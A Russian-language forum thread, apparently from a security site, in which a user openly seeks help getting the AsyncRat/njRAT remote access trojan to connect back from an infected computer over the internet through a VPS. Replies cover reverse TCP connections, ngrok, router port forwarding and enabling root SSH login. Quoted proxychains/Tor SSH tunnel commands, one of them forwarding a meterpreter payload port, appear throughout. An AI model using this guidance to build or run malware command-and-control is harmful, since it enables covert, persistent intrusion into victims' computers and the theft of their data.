• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Как настроить порты в Njrat | AsyncRat

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
Всем привет! Есть AsyncRat, аналог njrat.

Прекрасно работает в одной сети, localhost. Но когда запускаешь на другом пк, попросту главная машина (атакующая) не видит атакуемую.
Это скорее всего связано с тем, что задаю DNS 192.168.1.... - IPv4
Screenshot_2.png

Но мне нужно, чтобы атакуемая машина, могла подключиться, из глобального интернета, не из моей сети.
Про проброс портов смотрел, но нужно получить белый ip, так как у меня серый.
Возможно ли как-то по другому это все сделать, допустим, через vps, и туда все это поставить, но опять же, как это запустить на vps.
Может быть я что-то не так говорю, не осуждайте. Просто новичок в таких прогах и в разработке программ под пк.
Могу предоставить доступ к vps, если с ним надо что-то делать, отблагодарю денежно.
Спасибо!
 

f22

Codeby Academy
Gold Team
05.05.2019
1 846
225
BIT
1 136
Всем привет! Есть AsyncRat, аналог njrat.

Прекрасно работает в одной сети, localhost. Но когда запускаешь на другом пк, попросту главная машина (атакующая) не видит атакуемую.
Это скорее всего связано с тем, что задаю DNS 192.168.1.... - IPv4
Посмотреть вложение 34963
Но мне нужно, чтобы атакуемая машина, могла подключиться, из глобального интернета, не из моей сети.
Про проброс портов смотрел, но нужно получить белый ip, так как у меня серый.
Возможно ли как-то по другому это все сделать, допустим, через vps, и туда все это поставить, но опять же, как это запустить на vps.
Может быть я что-то не так говорю, не осуждайте. Просто новичок в таких прогах и в разработке программ под пк.
Могу предоставить доступ к vps, если с ним надо что-то делать, отблагодарю денежно.
Спасибо!
Во-первых атакуемая машина заведомо должна иметь доступ в интернет,
если его нет, то подключения, очевидно, могут происходить только внутри сети.

Во-вторых для атакуемой машине проброс портов не важен.
Это тебе нужно настроить роутер таким образом,
чтобы он точно знал, куда переадресовать переданный запрос.

Если у тебя есть VPS, подключись к нему, укажи в DNS свой IP и жди, подключения.
На удалённом VPS априори должен быть белый IP.
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
атакуемая машина
да, имеет

Если у тебя есть VPS, подключись к нему, укажи в DNS свой IP и жди, подключения

ок, сейчас попробую

Чего-то не совсем получается.

Там где Ip-адреса ставить адрес, полученный с 2ip.ru?
А где Доменное имя что вставить?
Screenshot_7.png

Вот еще файлы dns, которые на vps
/etc/resolv.conf
Screenshot_4.png


/etc/network/interfaces
вообще не существует
Screenshot_5.png
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
да, но никаких сессий не появляется
Слушаю порт 6606

Во-вторых для атакуемой машине проброс портов не важен.
Это тебе нужно настроить роутер таким образом,
чтобы он точно знал, куда переадресовать переданный запрос
Это тоже нужно было делать на Атакующей машине?
 

s unity

Green Team
18.09.2019
207
26
BIT
0
Есть ngrok, он и без впс установить соединение без проброса портов. Только после выключения на атакующем копме ngrok атакуемый не сможет больше восстановить сеть. Получается одноразовое соединение
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
это не подходит, нужно инфицировать компьютер, и иногда заходить смотреть, появилась ли какая-то инфа. А с ngrok можно не предугадать момент

а ты не знаешь, в чем моя ошибка, вроде бы все правильно сделал, vps есть, ngrat тоже. Только не понимаю куда делать проброс портов и имеет ли значение порт прослушивания
 

s unity

Green Team
18.09.2019
207
26
BIT
0
а ты не знаешь, в чем моя ошибка, вроде бы все правильно сделал, vps есть, ngrat тоже. Только не понимаю куда делать проброс портов и имеет ли значение порт прослушивания
Тебе нужно обратное tcp соединение, соотвестаенно нужны порты. Представь ты заказываешь пиццу, доставщику нежен твой адрес, который ты ему указываешь. Так вот, в ратнике указан адрес впс? Если так соотвественно пакеты будут идти на впс. Я завтра одну статейку подкину, там очень хорошо рассказанно про такую схему
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
Да, в ратнике указал адрес vps. А что дальше делать, не знаю. Я собственно ради белого ip и взял vps, чтобы у себя на компе с портами не мучатся.

Ок, спасибо тебе. Завтра думаю, прочитаю твою статью и уже все пойдет. Потому что гуглил
"vps njrat" ничего толком нету, показывает только vpn njrat
 

f22

Codeby Academy
Gold Team
05.05.2019
1 846
225
BIT
1 136
Это тоже нужно было делать на Атакующей машине?
Если она находится за роутером, то нужно делать, если это VPS, то нет.

Как ты настраиваешь этот njrat?
Ты просто скачал zip архив с github и запустил экзешник?



Как запускаешь на атакуемой машине?
сам твой сервер с неё пингуется хотя бы?
в CMD напиши ping и ip своего vps
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
Как ты настраиваешь этот njrat?
Ты просто скачал zip архив с github и запустил экзешник
Просто вставил ip vps, выбрал порт.

сам твой сервер с неё пингуется хотя бы?
да


Вроде бы я понял, как это сделать под njrat,
njrat же запускается на windows, и он как бы сам уже пингует vps и определенный порт на нем, правильно?
Получается мне надо только пробросить себе ssh

В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
это я должен выполнить на vps?

Затем еще идет один проброс
Затем пробрасываем себе порт, на который будет цепляться meterpreter
ssh -v -N -R PAYLOAD_PORT:KALI_ETH0_IP: PAYLOAD_PORT user@127.0.0.1 -p 42002

Как я выполню эту команду, если у меня windows? Перейти в linux и там запустить njrat?
 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
В общем, я поставил njrat на kali linux
попробовал запустить команду, как в статье
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 root@46.183.163.23
Просто доходит до определенного момента и все, до
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
Screenshot from 2019-11-17 19-26-43.png

В чем может быть проблема. Подскажите пожалуйста, просто больше нигде не могу найти как это сделать.

Потом пытаюсь выполнить эту команду
ssh -v -N -R 6606:192.168.1.4:6606 root@127.0.0.1 -p 42022
Требует пароль от root@127.0.0.1
По умолчанию стоит toor Но он не подходит
Screenshot from 2019-11-17 19-32-01.png


если выполняю на сервере (VPS), то пишет
debug1: connect to address 127.0.0.1 port 6606: Connection refused
ssh: connect to host 127.0.0.1 port 6606: Connection refused
 

f22

Codeby Academy
Gold Team
05.05.2019
1 846
225
BIT
1 136
По умолчанию стоит toor Но он не подходит
Ты пытаешься подключиться под пользователем root,
обычно это не хорошо, поэтому в настройка по умолчанию такая возможность отключена.
Чтобы её включить в файле /etc/ssh/sshd_config ,
найди строку PermitRootLogin и измени значение на Yes
Если в начале строки стоит знак решётки, удали его.
Строка должна выглядеть так
PermitRootLogin yes
Перезапусти демон sshd
service sshd restart

Забавно, 3 часа назад у человека тоже были проблемы с поиском этой настройки )
 

☠xrahitel☠

Grey Team
09.12.2016
240
305
BIT
59
kali linux ,vps ты танк купи сразу да и все
150.gif
купи тут дедик за 16р в сутки можешь и за 2р конечно и не надо чего настраивать и сделай как видео.

 

SolomonRei

Green Team
27.08.2018
24
1
BIT
0
всм на обоих хостах? Я же к локальке подключаюсь. Или на vps тоже надо сделать такие настройки?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!